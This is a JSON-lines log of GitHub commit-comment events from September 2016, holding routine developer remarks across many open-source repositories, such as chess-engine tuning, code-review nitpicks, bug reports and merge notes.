{"id":"4514484809","type":"CommitCommentEvent","actor":{"login":"Rocky640"},"repo":{"name":"Rocky640/Stockfish"},"payload":{"comment":{"id":18894413,"position":null,"line":null,"path":null,"commit_id":"d6b4dea7cb3cc15383ff02310ab166825ae69285","created_at":"2016-09-04T22:15:14Z","updated_at":"2016-09-04T22:15:14Z","body":"I doubt it will be faster than snicolet but it is almost working now. I will post an update."}},"created_at":"2016-09-04T22:15:14Z"}
{"id":"4514485538","type":"CommitCommentEvent","actor":{"login":"adnasa"},"repo":{"name":"hypebeast/dext-application-plugin"},"payload":{"comment":{"id":18894414,"position":null,"line":null,"path":null,"commit_id":"98395ddc2646a2b2162c621632b84bfc4c0f3651","created_at":"2016-09-04T22:15:47Z","updated_at":"2016-09-04T22:15:47Z","body":"👍 \r\nlooking forward to this one"}},"created_at":"2016-09-04T22:15:47Z"}
{"id":"4514492074","type":"CommitCommentEvent","actor":{"login":"thebigsmileXD"},"repo":{"name":"mwvent/WattzMCPE-MyPlot"},"payload":{"comment":{"id":18894417,"position":null,"line":null,"path":null,"commit_id":"45de6433908cf9d50c62e7331e223d6dd940835d","created_at":"2016-09-04T22:20:52Z","updated_at":"2016-09-04T22:20:52Z","body":"Yea, its running really fine, even the automatic plot does not \"steal\" plots anymore. I actually have a world border around my world, but already reached the end at one side. There are plenty of plots never buildt on..\r\nMany thanks for debugging this stuff. This, and PocketTelegram were always segfaulting my server.\r\nI searched hours and hours.. checked the commands, the execution etc, if it only crashed if succeeded or not, how commands are registered etc. Even checked my whole database for errors 3 days..\r\n\r\nWould've never thought its a query problem.\r\n\r\nI even some things to prevent players from building on streets again (because they are simply walkways for me), disabling item frame interaction if you are no helper and fixed paintings being removed by players.\r\nIts nice to see that buckets and liquid flow is fixed too, i tried it once but had an issue when water/lava plows down onto the plot border. Seems fixed.\r\n\r\nI still think the MySQL provider is the most useful of all those, especially because of Dynmap, claims and live plot data.\r\nHey.. could you think about a way to check if a still is unchanged since claiming and removing it after 30 days? i only thought about a second mysql table which saves the id's and last edited and last claimed. if last edited - last claimed >= 30 -> p clear, p dispose."}},"created_at":"2016-09-04T22:20:52Z"}
{"id":"4514493333","type":"CommitCommentEvent","actor":{"login":"pepe57"},"repo":{"name":"OCA/connector-lims"},"payload":{"comment":{"id":18894420,"position":null,"line":null,"path":null,"commit_id":"461c5f60e29cfc6856ff6ffcc939a8eb53337703","created_at":"2016-09-04T22:21:58Z","updated_at":"2016-09-04T22:21:58Z","body":"I work as a RSI in a laboratory company.\r\nWe just bought STARLIMS !\r\nI Wonder wether connector-lims fits ?\r\nSorry for my English!"}},"created_at":"2016-09-04T22:21:58Z"}
{"id":"4514494061","type":"CommitCommentEvent","actor":{"login":"lucabrivio"},"repo":{"name":"lucabrivio/Stockfish"},"payload":{"comment":{"id":18894421,"position":null,"line":null,"path":null,"commit_id":"ca526000f65603557e98fd3b0dbd98e7ad964ac8","created_at":"2016-09-04T22:22:35Z","updated_at":"2016-09-04T22:22:35Z","body":"@snicolet Good luck!\nIt is possible that the value become negative but that seems fine with your \ncode (as long as you call it differently)! :-)\n"}},"created_at":"2016-09-04T22:22:35Z"}
{"id":"4514495083","type":"CommitCommentEvent","actor":{"login":"gladiatr72"},"repo":{"name":"saltstack/salt"},"payload":{"comment":{"id":18894422,"position":null,"line":null,"path":null,"commit_id":"a662ea53374753337b900a0b18a1824c266c4136","created_at":"2016-09-04T22:23:23Z","updated_at":"2016-09-04T22:23:23Z","body":"🎉 "}},"created_at":"2016-09-04T22:23:23Z"}
{"id":"4514495250","type":"CommitCommentEvent","actor":{"login":"zhemao"},"repo":{"name":"ucb-bar/rocket-chip"},"payload":{"comment":{"id":18894423,"position":22,"line":88,"path":"src/main/scala/coreplex/Coreplex.scala","commit_id":"f34843f1b9f567caca4b213a7541b225c6bbb169","created_at":"2016-09-04T22:23:33Z","updated_at":"2016-09-04T22:23:33Z","body":"Oh, whoops. Well, we can fix it back if we ever touch this code again."}},"created_at":"2016-09-04T22:23:33Z"}
{"id":"4514496273","type":"CommitCommentEvent","actor":{"login":"quozl"},"repo":{"name":"samdroid-apps/sugar"},"payload":{"comment":{"id":18894424,"position":84,"line":84,"path":"src/jarabe/journal/projectview.py","commit_id":"67b546ef5d81f7b0968fda06d99a5767e12953aa","created_at":"2016-09-04T22:24:27Z","updated_at":"2016-09-04T22:24:27Z","body":"I've no optimal method.  It was a chance discovery.  I'll speculate:\r\n\r\n* Checkout a detached HEAD as of last update of POTFILES.in (cbf37e6ae94bbea86f801861759c37290a155700), and make a list of *.py files in the tree.\r\n* Checkout master, and make another list of *.py files in the tree.\r\n* Compare the lists to generate a list of new *.py files since last update of POTFILES.in.\r\n* Look in those files for `_('` or `_(\"`, which gives you a list of files to append to POTFILES.in,\r\n* edit POTFILES.in, sort, colour in crayon for entertainment to compensate for the utter drudgery of it all, then commit the change.\r\n* re-read `man grep` to learn how to automate it, especially `--file` and `--invert-match`, or write something in Python, or find that someone already did it. :frowning:\r\n* whinge in future pull requests that forget to update POTFILES.in. :grin:\r\n"}},"created_at":"2016-09-04T22:24:27Z"}
{"id":"4514497871","type":"CommitCommentEvent","actor":{"login":"zhemao"},"repo":{"name":"ucb-bar/rocket-chip"},"payload":{"comment":{"id":18894425,"position":null,"line":null,"path":null,"commit_id":"f34843f1b9f567caca4b213a7541b225c6bbb169","created_at":"2016-09-04T22:25:47Z","updated_at":"2016-09-04T22:25:47Z","body":"You need a flatmap to flatten the sequence of vec of bools into a single sequence of bools. I thought about doing it your way at first but decided this was simpler. I guess using nested foreach avoids making an intermediate vector."}},"created_at":"2016-09-04T22:25:47Z"}
{"id":"4514499281","type":"CommitCommentEvent","actor":{"login":"abrander"},"repo":{"name":"asdine/storm"},"payload":{"comment":{"id":18894427,"position":null,"line":null,"path":null,"commit_id":"75b7df7a2274a463ac657057956d6c8a16e54694","created_at":"2016-09-04T22:27:08Z","updated_at":"2016-09-04T22:27:08Z","body":"I would have expected the opposite - well, that just shows how important profiling is. Thanks!"}},"created_at":"2016-09-04T22:27:08Z"}
{"id":"4514502388","type":"CommitCommentEvent","actor":{"login":"dariaswoap"},"repo":{"name":"dariaswoap/Daria-Swoap-Essay-"},"payload":{"comment":{"id":18894431,"position":null,"line":null,"path":null,"commit_id":"efb69b234ae7951b327b38768dca3e18b4f5795c","created_at":"2016-09-04T22:29:47Z","updated_at":"2016-09-04T22:29:47Z","body":"Great!"}},"created_at":"2016-09-04T22:29:47Z"}
{"id":"4514502417","type":"CommitCommentEvent","actor":{"login":"shawnwahi"},"repo":{"name":"AOSPA/android_packages_apps_Settings"},"payload":{"comment":{"id":18894432,"position":null,"line":null,"path":null,"commit_id":"b954d8833bbc57e1822896304f98bd07ef9e1d37","created_at":"2016-09-04T22:29:48Z","updated_at":"2016-09-04T22:29:48Z","body":"@evan-a-a "}},"created_at":"2016-09-04T22:29:48Z"}
{"id":"4514503934","type":"CommitCommentEvent","actor":{"login":"TheCrazyLex"},"repo":{"name":"AOSPA/android_packages_apps_Settings"},"payload":{"comment":{"id":18894433,"position":null,"line":null,"path":null,"commit_id":"b954d8833bbc57e1822896304f98bd07ef9e1d37","created_at":"2016-09-04T22:30:51Z","updated_at":"2016-09-04T22:30:51Z","body":"Where's the fix? "}},"created_at":"2016-09-04T22:30:51Z"}
{"id":"4514504869","type":"CommitCommentEvent","actor":{"login":"shawnwahi"},"repo":{"name":"AOSPA/android_packages_apps_Settings"},"payload":{"comment":{"id":18894435,"position":null,"line":null,"path":null,"commit_id":"b954d8833bbc57e1822896304f98bd07ef9e1d37","created_at":"2016-09-04T22:31:38Z","updated_at":"2016-09-04T22:31:38Z","body":"Line 127"}},"created_at":"2016-09-04T22:31:38Z"}
{"id":"4514505455","type":"CommitCommentEvent","actor":{"login":"lucabrivio"},"repo":{"name":"snicolet/Stockfish"},"payload":{"comment":{"id":18894440,"position":null,"line":null,"path":null,"commit_id":"80d9e7591f9d2b9dab7ce1a1f952b0ce68585ad1","created_at":"2016-09-04T22:32:10Z","updated_at":"2016-09-04T22:32:10Z","body":"Time for a big yellow combo patch ;-)"}},"created_at":"2016-09-04T22:32:10Z"}
{"id":"4514505783","type":"CommitCommentEvent","actor":{"login":"TheCrazyLex"},"repo":{"name":"AOSPA/android_packages_apps_Settings"},"payload":{"comment":{"id":18894442,"position":null,"line":null,"path":null,"commit_id":"b954d8833bbc57e1822896304f98bd07ef9e1d37","created_at":"2016-09-04T22:32:24Z","updated_at":"2016-09-04T22:32:24Z","body":"Ah yeah, right. This is not needed then. "}},"created_at":"2016-09-04T22:32:24Z"}
{"id":"4514506274","type":"CommitCommentEvent","actor":{"login":"shawnwahi"},"repo":{"name":"AOSPA/android_packages_apps_Settings"},"payload":{"comment":{"id":18894445,"position":null,"line":null,"path":null,"commit_id":"b954d8833bbc57e1822896304f98bd07ef9e1d37","created_at":"2016-09-04T22:32:48Z","updated_at":"2016-09-04T22:32:48Z","body":":+1: "}},"created_at":"2016-09-04T22:32:48Z"}
{"id":"4514507432","type":"CommitCommentEvent","actor":{"login":"baileypa"},"repo":{"name":"baileypa/website"},"payload":{"comment":{"id":18894446,"position":3,"line":3,"path":"lipsum.txt","commit_id":"f513b0223b9c71ed472de6bf1c031fe54ef7e504","created_at":"2016-09-04T22:33:46Z","updated_at":"2016-09-04T22:33:46Z","body":"#lipsum really\r\n\r\nSo we really were no able to find better filler"}},"created_at":"2016-09-04T22:33:46Z"}
{"id":"4514508616","type":"CommitCommentEvent","actor":{"login":"gotkrypto76"},"repo":{"name":"gotkrypto76/fileProto"},"payload":{"comment":{"id":18894449,"position":null,"line":null,"path":null,"commit_id":"09d2f82c6461137c1cafe4a12febe5427b976ba0","created_at":"2016-09-04T22:34:43Z","updated_at":"2016-09-04T22:34:43Z","body":"Looks like safari crashes when calling any non-existant, 4 character, empty protocol."}},"created_at":"2016-09-04T22:34:43Z"}
{"id":"4514510528","type":"CommitCommentEvent","actor":{"login":"blookvoodow"},"repo":{"name":"cursey/kanan"},"payload":{"comment":{"id":18894453,"position":null,"line":null,"path":null,"commit_id":"c74bdd326c11d30aec1e0f716a079cbfd9e2eb75","created_at":"2016-09-04T22:36:23Z","updated_at":"2016-09-04T22:36:23Z","body":"between Nexon and Library"}},"created_at":"2016-09-04T22:36:23Z"}
{"id":"4514511082","type":"CommitCommentEvent","actor":{"login":"mysteryan"},"repo":{"name":"mysteryan/ha-bridge"},"payload":{"comment":{"id":18894454,"position":null,"line":null,"path":null,"commit_id":"6075af25cd52026fbd7306946ca65c7e8178d00f","created_at":"2016-09-04T22:36:56Z","updated_at":"2016-09-04T22:36:56Z","body":"Handles changes in device state when using official Hue app (as well as many others presumably) when the device responds with colormode value pointing to the properties of interest.  The Hue app clumps all devices in a null color state without property despite changes in ct, hue and/or sat (only xy reflects updates in changes in extended properties other state and bri).  I.e making json request with \"colormode\": ct would properly make that device stick to that ct color space when controlling with the hue app.  Otherwise, it'll be clumped with all the other devices with null color making it harder to manage."}},"created_at":"2016-09-04T22:36:56Z"}
{"id":"4514513296","type":"CommitCommentEvent","actor":{"login":"Ghostkeeper"},"repo":{"name":"Ultimaker/Cura"},"payload":{"comment":{"id":18894458,"position":121,"line":406,"path":"plugins/XmlMaterialProfile/XmlMaterialProfile.py","commit_id":"eb176847bef1ee81aa74c6ad989d6e233ef46667","created_at":"2016-09-04T22:38:56Z","updated_at":"2016-09-04T22:38:56Z","body":"Then all that needs to be done is to document this in our meta repository as a case where our code conventions differ from PEP8."}},"created_at":"2016-09-04T22:38:56Z"}
{"id":"4514516306","type":"CommitCommentEvent","actor":{"login":"cursey"},"repo":{"name":"cursey/kanan"},"payload":{"comment":{"id":18894462,"position":null,"line":null,"path":null,"commit_id":"c74bdd326c11d30aec1e0f716a079cbfd9e2eb75","created_at":"2016-09-04T22:41:29Z","updated_at":"2016-09-04T22:41:29Z","body":"That's where Nexon Launcher put mine, NexonLibrary, not Nexon\\Library. It's not meant to be universal anyway. Users are expected to change it to match their setup."}},"created_at":"2016-09-04T22:41:29Z"}
{"id":"4514522380","type":"CommitCommentEvent","actor":{"login":"othiagoduarte"},"repo":{"name":"othiagoduarte/mytcc"},"payload":{"comment":{"id":18894465,"position":null,"line":null,"path":null,"commit_id":"28af715059b4f9dda7ab299f95001a62df728ad8","created_at":"2016-09-04T22:46:45Z","updated_at":"2016-09-04T22:46:45Z","body":"<a href=\"https:&#x2F;&#x2F;trello.com&#x2F;c&#x2F;6oo04xfh&#x2F;30-2-criar-um-repositorio-no-github-para-versionar-o-projeto\"><img src=\"https:&#x2F;&#x2F;github.trello.services&#x2F;images&#x2F;trello-icon.png\" width=\"12\" height=\"12\"> (2)Criar um repositório no github para versionar o projeto</a>"}},"created_at":"2016-09-04T22:46:45Z"}
{"id":"4514523474","type":"CommitCommentEvent","actor":{"login":"nortikin"},"repo":{"name":"nortikin/sverchok"},"payload":{"comment":{"id":18894467,"position":null,"line":null,"path":null,"commit_id":"c86190f96bf659deb6c0de3bf52cdfdf3c8cf665","created_at":"2016-09-04T22:47:47Z","updated_at":"2016-09-04T22:47:47Z","body":"importlib cannot do:\r\n\r\n> .config/blender/2.76/scripts/addons/sverchok-master/ui/monad.py\", line 104\r\n>     set_multiple_attrs(m, **socket_ref, direction=-1)\r\n>                                       ^\r\n> SyntaxError: invalid syntax\r\n"}},"created_at":"2016-09-04T22:47:47Z"}
{"id":"4514524609","type":"CommitCommentEvent","actor":{"login":"TiBarification"},"repo":{"name":"R1KO/OctoBans"},"payload":{"comment":{"id":18894468,"position":455,"line":455,"path":"addons/sourcemod/scripting/OctoBans.sp","commit_id":"34fd48b940d0d1a2f1922e4fbebf7e494521c965","created_at":"2016-09-04T22:48:51Z","updated_at":"2016-09-04T22:48:51Z","body":"Зачем здесь прерывать ф-цию, если есть каллбек OnTransferComplete, который хукает успех выполненого запроса. Лучше такие проверки делать в OnTransferComplete."}},"created_at":"2016-09-04T22:48:51Z"}
{"id":"4514525202","type":"CommitCommentEvent","actor":{"login":"TiBarification"},"repo":{"name":"R1KO/OctoBans"},"payload":{"comment":{"id":18894470,"position":497,"line":497,"path":"addons/sourcemod/scripting/OctoBans.sp","commit_id":"34fd48b940d0d1a2f1922e4fbebf7e494521c965","created_at":"2016-09-04T22:49:20Z","updated_at":"2016-09-04T22:49:20Z","body":"Забываешь удалять hJson перед выходом из функции"}},"created_at":"2016-09-04T22:49:20Z"}
{"id":"4514525407","type":"CommitCommentEvent","actor":{"login":"TiBarification"},"repo":{"name":"R1KO/OctoBans"},"payload":{"comment":{"id":18894471,"position":514,"line":514,"path":"addons/sourcemod/scripting/OctoBans.sp","commit_id":"34fd48b940d0d1a2f1922e4fbebf7e494521c965","created_at":"2016-09-04T22:49:31Z","updated_at":"2016-09-04T22:49:31Z","body":"Тут тоже забываешь"}},"created_at":"2016-09-04T22:49:31Z"}
{"id":"4514527658","type":"CommitCommentEvent","actor":{"login":"luck3y"},"repo":{"name":"luck3y/blt4l"},"payload":{"comment":{"id":18894474,"position":null,"line":null,"path":null,"commit_id":"1e32e032f3c069298d8e6fb275bb46d344415938","created_at":"2016-09-04T22:51:22Z","updated_at":"2016-09-04T22:51:22Z","body":"FYI this happens to me because I'm using XFS, which returns DT_UNKNOWN for everything in the mod directory, except '.' and '..' ."}},"created_at":"2016-09-04T22:51:22Z"}
{"id":"4514528906","type":"CommitCommentEvent","actor":{"login":"zita212"},"repo":{"name":"openwrt-vgv7519/uboot-bin"},"payload":{"comment":{"id":18894476,"position":null,"line":null,"path":null,"commit_id":"76fdd8e638f81e324ffe77856481bd147398f6e8","created_at":"2016-09-04T22:52:29Z","updated_at":"2016-09-04T22:52:29Z","body":"Figured out, /etc/opkg/distfeeds.conf had the luci entry commented out by default. Quite sure when I compiled the lede image I enable in menuconfig luci feeds. Oh well. Now need to figure out if I can bridge together the 4 LAN ports with the Gigabit Ethernet WAN port and the WLAN port (effectively to build a 5 port Gigabit Ethernet switch with AP functionality)"}},"created_at":"2016-09-04T22:52:29Z"}
{"id":"4514534000","type":"CommitCommentEvent","actor":{"login":"filipay"},"repo":{"name":"filipay/monitroom"},"payload":{"comment":{"id":18894483,"position":null,"line":null,"path":null,"commit_id":"30f322b69ea14c6e4388c5be2d2dbb4d639f47f6","created_at":"2016-09-04T22:56:59Z","updated_at":"2016-09-04T22:56:59Z","body":"wow wtf"}},"created_at":"2016-09-04T22:56:59Z"}
{"id":"4514537407","type":"CommitCommentEvent","actor":{"login":"stefek99"},"repo":{"name":"trinketmage/three.js-vr-hud"},"payload":{"comment":{"id":18894487,"position":199,"line":199,"path":"example/index.html","commit_id":"ca67bf6673a5f03487d654e7ed0e5e092a957a9f","created_at":"2016-09-04T22:59:55Z","updated_at":"2016-09-04T22:59:55Z","body":"I know it is 1 - http://mathforum.org/dr.math/faq/faq.0.9999.html - I'm just wondering whether it makes difference to have int / float / number / decimal here..."}},"created_at":"2016-09-04T22:59:55Z"}
{"id":"4514540105","type":"CommitCommentEvent","actor":{"login":"kmike"},"repo":{"name":"pytries/marisa-trie"},"payload":{"comment":{"id":18894489,"position":100,"line":207,"path":"src/marisa_trie.pyx","commit_id":"5938146a9df49d544c829d28f5c14a0bb9aa3ada","created_at":"2016-09-04T23:01:56Z","updated_at":"2016-09-04T23:01:56Z","body":"A nitpick: [pep257](https://www.python.org/dev/peps/pep-0257/) says that docstrings should use imperative mood:\r\n\r\n> The docstring is a phrase ending in a period. It prescribes the function or method's effect as a command (\"Do this\", \"Return that\"), not as a description; e.g. don't write \"Returns the pathname ...\". "}},"created_at":"2016-09-04T23:01:56Z"}
{"id":"4514542795","type":"CommitCommentEvent","actor":{"login":"Studioartcz"},"repo":{"name":"wundermanpraha/cms"},"payload":{"comment":{"id":18894492,"position":null,"line":null,"path":null,"commit_id":"39b8e2c84b7530c6b28a8ea90a1e69c8d6338c58","created_at":"2016-09-04T23:03:57Z","updated_at":"2016-09-04T23:03:57Z","body":"\"Cesta k administraci je `cesta-k-cms/admin/`\\\r\n  Pokud neexistuje žádný uživatel, budete vyzván k jeho založení.\t\t  Pokud neexistuje žádný uživatel, budete vyzván k jeho založení.\"\r\n\r\ntoto nefunguje"}},"created_at":"2016-09-04T23:03:57Z"}
{"id":"4514546859","type":"CommitCommentEvent","actor":{"login":"frankmayer"},"repo":{"name":"arangodb/arangodb-php"},"payload":{"comment":{"id":18894497,"position":47,"line":47,"path":"CHANGELOG","commit_id":"8aca9a25e1b676f64f7790a16650f88b22c2ab50","created_at":"2016-09-04T23:07:08Z","updated_at":"2016-09-04T23:07:08Z","body":"Hi @jsteemann,\r\nAny info on why the batch functionality was removed in the PHP-Driver? It is still available in the API of the server in V3. (https://docs.arangodb.com/3.0/HTTP/BatchRequest/index.html)"}},"created_at":"2016-09-04T23:07:08Z"}
{"id":"4514547244","type":"CommitCommentEvent","actor":{"login":"ngkaho1234"},"repo":{"name":"saghul/libuv"},"payload":{"comment":{"id":18894498,"position":6,"line":264,"path":"test/test-tty.c","commit_id":"7a56e7199cbd014889d1aec6c5362d3afc60a72a","created_at":"2016-09-04T23:07:28Z","updated_at":"2016-09-04T23:07:28Z","body":"Line from 264 to 270 should be wrapped with parentheses in order to fix https://github.com/libuv/libuv/issues/1029."}},"created_at":"2016-09-04T23:07:28Z"}
{"id":"4514548566","type":"CommitCommentEvent","actor":{"login":"HalosGhost"},"repo":{"name":"cthlo/exoduscli"},"payload":{"comment":{"id":18894500,"position":null,"line":null,"path":null,"commit_id":"129da55ad7e7061412e1802a3173e53d1c1a4188","created_at":"2016-09-04T23:08:38Z","updated_at":"2016-09-04T23:08:38Z","body":"Oh, that's too bad; I was hoping the resolver could be updated so that it could still be used. It is one of the more reliable ones."}},"created_at":"2016-09-04T23:08:38Z"}
{"id":"4514549532","type":"CommitCommentEvent","actor":{"login":"2BReality"},"repo":{"name":"2BReality/2breality2"},"payload":{"comment":{"id":18894502,"position":null,"line":null,"path":null,"commit_id":"6b7ce4f41d2165db3e7d70f684c565871807b871","created_at":"2016-09-04T23:09:32Z","updated_at":"2016-09-04T23:09:32Z","body":"- [ ] Find others to code with.\r\n- [ ] Have fun coding with others remotely\r\n- [ ] Make a lot of money  having fun coding with others remotely\r\n- [ ] Make a lot of money  having fun coding with others remotely wearing Pajamas \r\n- [ ] [Make a lot of money  having fun coding with others remotely wearing Pajamas & drinking a latte ](https://blog.codinghorror.com/on-working-remotely/)"}},"created_at":"2016-09-04T23:09:32Z"}
{"id":"4514550403","type":"CommitCommentEvent","actor":{"login":"2BReality"},"repo":{"name":"2BReality/2breality2"},"payload":{"comment":{"id":18894503,"position":null,"line":null,"path":null,"commit_id":"6b7ce4f41d2165db3e7d70f684c565871807b871","created_at":"2016-09-04T23:10:14Z","updated_at":"2016-09-04T23:10:14Z","body":"????"}},"created_at":"2016-09-04T23:10:14Z"}
{"id":"4514551322","type":"CommitCommentEvent","actor":{"login":"thebigsmileXD"},"repo":{"name":"iTXTech/Genisys"},"payload":{"comment":{"id":18894504,"position":null,"line":null,"path":null,"commit_id":"aec7a3ed85a04f30b9d72b70142777864949ca9e","created_at":"2016-09-04T23:11:01Z","updated_at":"2016-09-04T23:11:01Z","body":"Thanks @dktapps , now /makeplugin works again."}},"created_at":"2016-09-04T23:11:01Z"}
{"id":"4514551445","type":"CommitCommentEvent","actor":{"login":"fommil"},"repo":{"name":"cask/cask"},"payload":{"comment":{"id":18894505,"position":5,"line":685,"path":"cask.el","commit_id":"c85700d8fb3522cb3f26bc0c668c90dd451ecd5c","created_at":"2016-09-04T23:11:09Z","updated_at":"2016-09-04T23:11:09Z","body":"@phillord this broke the ensime emacs tests :wink: please let me know if you plan on changing it again. This is a breaking change so I had to change all my archlinux-installed `cask`s to use the python one instead to be consistent. See https://github.com/ensime/ensime-emacs/pull/509 I think it's been broken since we picked up this version of Cask."}},"created_at":"2016-09-04T23:11:09Z"}
{"id":"4514560704","type":"CommitCommentEvent","actor":{"login":"CoolOppo"},"repo":{"name":"ZenLulz/MemorySharp"},"payload":{"comment":{"id":18894517,"position":null,"line":null,"path":null,"commit_id":"fd49a2069f37d9f7e4ce8c66256ec401c5254170","created_at":"2016-09-04T23:19:04Z","updated_at":"2016-09-04T23:19:04Z","body":"@lolp1 pinging you in case you don't see this ^^"}},"created_at":"2016-09-04T23:19:04Z"}
{"id":"4514560787","type":"CommitCommentEvent","actor":{"login":"nadako"},"repo":{"name":"HaxeFoundation/haxe"},"payload":{"comment":{"id":18894518,"position":null,"line":null,"path":null,"commit_id":"b0d04033729d08203c0143caf0499627c07e04d0","created_at":"2016-09-04T23:19:09Z","updated_at":"2016-09-04T23:19:09Z","body":"doesn't seem to fix workspace symbols"}},"created_at":"2016-09-04T23:19:09Z"}
{"id":"4514569595","type":"CommitCommentEvent","actor":{"login":"katiayn"},"repo":{"name":"jonathas/django-tasks-report"},"payload":{"comment":{"id":18894523,"position":7,"line":29,"path":"README.md","commit_id":"6385ec370d3245aad4a087892b771813401ae430","created_at":"2016-09-04T23:26:51Z","updated_at":"2016-09-04T23:26:51Z","body":"`python manage.py migrate` 👍 "}},"created_at":"2016-09-04T23:26:51Z"}
{"id":"4514573416","type":"CommitCommentEvent","actor":{"login":"Hammman"},"repo":{"name":"binary-koan/StoryMapJS"},"payload":{"comment":{"id":18894529,"position":null,"line":null,"path":null,"commit_id":"d66b33f6faf461c6dc7a6532c008039248c62ee9","created_at":"2016-09-04T23:30:23Z","updated_at":"2016-09-04T23:30:23Z","body":"Still needs something for mongo to support switching servers in some way?"}},"created_at":"2016-09-04T23:30:23Z"}
{"id":"4514575322","type":"CommitCommentEvent","actor":{"login":"engstk"},"repo":{"name":"engstk/android_device_oneplus_onyx"},"payload":{"comment":{"id":18894532,"position":null,"line":null,"path":null,"commit_id":"688a9414491fdf84e7bf760be53747d5cc609f62","created_at":"2016-09-04T23:32:10Z","updated_at":"2016-09-04T23:32:10Z","body":"Don't merge"}},"created_at":"2016-09-04T23:32:10Z"}
{"id":"4514576126","type":"CommitCommentEvent","actor":{"login":"engstk"},"repo":{"name":"engstk/android_device_oneplus_onyx"},"payload":{"comment":{"id":18894533,"position":null,"line":null,"path":null,"commit_id":"14482212dd16175517898c5f3a2468572fa860d3","created_at":"2016-09-04T23:32:58Z","updated_at":"2016-09-04T23:32:58Z","body":"Don't merge"}},"created_at":"2016-09-04T23:32:58Z"}
{"id":"4514576324","type":"CommitCommentEvent","actor":{"login":"engstk"},"repo":{"name":"engstk/android_device_oneplus_onyx"},"payload":{"comment":{"id":18894534,"position":null,"line":null,"path":null,"commit_id":"eabfb35e5de2f73418bf87e35ba3a6797211da3c","created_at":"2016-09-04T23:33:09Z","updated_at":"2016-09-04T23:33:09Z","body":"Don't merge"}},"created_at":"2016-09-04T23:33:09Z"}
{"id":"4514577712","type":"CommitCommentEvent","actor":{"login":"lucasfogliarini"},"repo":{"name":"maximn/google-maps"},"payload":{"comment":{"id":18894535,"position":38,"line":48,"path":"GoogleMapsApi/Entities/Geocoding/Request/GeocodingComponents.cs","commit_id":"94fc7d534e8390a3997a17f4e140f8c648a2bf7d","created_at":"2016-09-04T23:34:25Z","updated_at":"2016-09-04T23:34:25Z","body":"I did not know that :scream: "}},"created_at":"2016-09-04T23:34:25Z"}
{"id":"4514578265","type":"CommitCommentEvent","actor":{"login":"gts546167"},"repo":{"name":"gts546167/-"},"payload":{"comment":{"id":18894538,"position":null,"line":null,"path":null,"commit_id":"df2dfa8a265fd5526ac0eee85233a060e41cf8a7","created_at":"2016-09-04T23:34:56Z","updated_at":"2016-09-04T23:34:56Z","body":"Ok"}},"created_at":"2016-09-04T23:34:56Z"}
{"id":"4514579270","type":"CommitCommentEvent","actor":{"login":"Italic-"},"repo":{"name":"meta-androcto/blenderpython"},"payload":{"comment":{"id":18894540,"position":null,"line":null,"path":null,"commit_id":"b7a900b1ab45e0b53a46eec8ec7ecbcc1f3ac0df","created_at":"2016-09-04T23:35:42Z","updated_at":"2016-09-04T23:35:42Z","body":"io_meshlab recommitted after this PR."}},"created_at":"2016-09-04T23:35:42Z"}
{"id":"4514581464","type":"CommitCommentEvent","actor":{"login":"lucabrivio"},"repo":{"name":"snicolet/Stockfish"},"payload":{"comment":{"id":18894543,"position":null,"line":null,"path":null,"commit_id":"760d8b1640eb0cba65be3a57ce9d32e7927d3554","created_at":"2016-09-04T23:37:25Z","updated_at":"2016-09-04T23:37:25Z","body":"Hmm `S(45, 40)` is maybe too much but I think we should not remove `Isolated[opposed]`...\r\nBy the way the reason for the test to quickly fail might also be that you did not compensate in pawn (piece) value... but also, for instance, you're basically often giving a `S(90, 80)` penalty for pushing a pawn by two squares... IMHO \"groups\" should be used elsewhere, for example in piece evaluation and/or initiative..."}},"created_at":"2016-09-04T23:37:25Z"}
{"id":"4514582431","type":"CommitCommentEvent","actor":{"login":"lucasfogliarini"},"repo":{"name":"maximn/google-maps"},"payload":{"comment":{"id":18894544,"position":46,"line":39,"path":"GoogleMapsApi/Entities/Geocoding/Request/GeocodingComponents.cs","commit_id":"7350607c62a2b1c72f5969fc1053f2f4680154af","created_at":"2016-09-04T23:38:11Z","updated_at":"2016-09-04T23:38:11Z","body":"Very nice, i always forget this strategy, i will adjust."}},"created_at":"2016-09-04T23:38:11Z"}
{"id":"4514586650","type":"CommitCommentEvent","actor":{"login":"1KX2"},"repo":{"name":"riotpunch/sloth-bot"},"payload":{"comment":{"id":18894549,"position":null,"line":null,"path":null,"commit_id":"a30cd2f855a527ca76c76bc989a533a230a53f91","created_at":"2016-09-04T23:41:58Z","updated_at":"2016-09-04T23:41:58Z","body":"..... I really did like Sloth.."}},"created_at":"2016-09-04T23:41:58Z"}
{"id":"4514587696","type":"CommitCommentEvent","actor":{"login":"1KX2"},"repo":{"name":"luigiplr/sloth-bot"},"payload":{"comment":{"id":18894551,"position":null,"line":null,"path":null,"commit_id":"583142b86b5bc7d3c719fec237f7fceda4a8c09c","created_at":"2016-09-04T23:42:57Z","updated_at":"2016-09-04T23:42:57Z","body":"I'm still here....... "}},"created_at":"2016-09-04T23:42:57Z"}
{"id":"4514587912","type":"CommitCommentEvent","actor":{"login":"nayyoung"},"repo":{"name":"nayyoung/hello-world"},"payload":{"comment":{"id":18894552,"position":null,"line":null,"path":null,"commit_id":"503da2607cdee70301ab829dc4da4f6ec1dd75cf","created_at":"2016-09-04T23:43:10Z","updated_at":"2016-09-04T23:43:10Z","body":"Hello. This is my first GitHub project. I am getting used to the basics. This is pretty neat."}},"created_at":"2016-09-04T23:43:10Z"}
{"id":"4514589807","type":"CommitCommentEvent","actor":{"login":"1KX2"},"repo":{"name":"Magics-Group/magics-challenge"},"payload":{"comment":{"id":18894554,"position":null,"line":null,"path":null,"commit_id":"302b3a38a3401f5e414586413ddf01c0d16104c5","created_at":"2016-09-04T23:44:46Z","updated_at":"2016-09-04T23:44:46Z","body":"I'll stalk all the Gits....... "}},"created_at":"2016-09-04T23:44:46Z"}
{"id":"4514589833","type":"CommitCommentEvent","actor":{"login":"janten"},"repo":{"name":"DovAmir/docker-swarm-visualizer"},"payload":{"comment":{"id":18894555,"position":2,"line":2,"path":"push.sh","commit_id":"6dc4d83c26a2ee4cc198125f2e7ae114dcd70d76","created_at":"2016-09-04T23:44:47Z","updated_at":"2016-09-04T23:44:47Z","body":"Should this be in the public repository?"}},"created_at":"2016-09-04T23:44:47Z"}
